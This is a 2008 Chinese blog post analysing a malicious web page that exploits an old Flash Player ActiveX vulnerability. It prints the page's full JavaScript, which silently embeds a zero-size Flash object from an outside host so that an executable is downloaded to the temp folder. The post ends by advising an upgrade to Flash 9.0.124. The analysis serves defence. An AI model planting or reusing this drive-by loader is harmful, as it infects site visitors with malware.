数据加载中……


 

 登   陆

我的分类(专题)
数据加载中……

链接

Blog信息
数据加载中……

 

网马分析-利用Flash Player ActiveX 9.0.115以下版本漏洞的网马出现!
樱木花盗 发表于 2008-5-27 0:20:46
本文来自死性不改的博客 http://www.clxp.net.cn 转载请保留此申明!

信息来源:穷人。
以前一直听说FLASH报漏洞,但是一直以来都没见过。今天终于有幸一见。
今天遇见这个应该只是属于测试版漏洞执行代码,并没有带毒。但是exe文件确实已经下载到ie缓存和系统的%temp%文件夹了。

网马地址:http://www.xxx.com/0000001.htm

代码:
程序代码
<html>
<script>
document.write("123");
window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1){
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');
document.write('<param name="allowScriptAccess" value="/BLOG/sameDomain"/>');
document.write("<param name="movie" value="http://www.chinaronk.com/ie.swf"/>');
document.write('<param name="quality" value="high"/>');
document.write('<param name="bgcolor" value="#ffffff"/>');
document.write('<embed src="http://www.xxx.com/ie.swf"/>');
document.write('</object>');
}else
{document.write("NO");}}
</script>
</html>


会下载http://www.xxx.com/hi.exe,并复制自身到%temp%目录下。效果图



http://www.xxx.com/ie.swf文件会打开另外一个FLASH地址http://www.xxx.com/ie1725.swf

受影响的Flash Player版本:9.0.115以前的老版本。

堵住这个漏洞很简单,升级Flash Player ActiveX 到9.0.124版本以上就不会有问题了。

新典网下载Flash Player ActiveX 9.0.124
华军下载Flash Player ActiveX 10.0.1.218

再次感谢穷人分享漏洞信息!

阅读全文 | 回复(0) | 引用通告 | 编辑
 


发表评论:

    昵称:
    密码: (游客无须输入密码)
    主页:
    标题:
    数据加载中……


Powered by Oblog.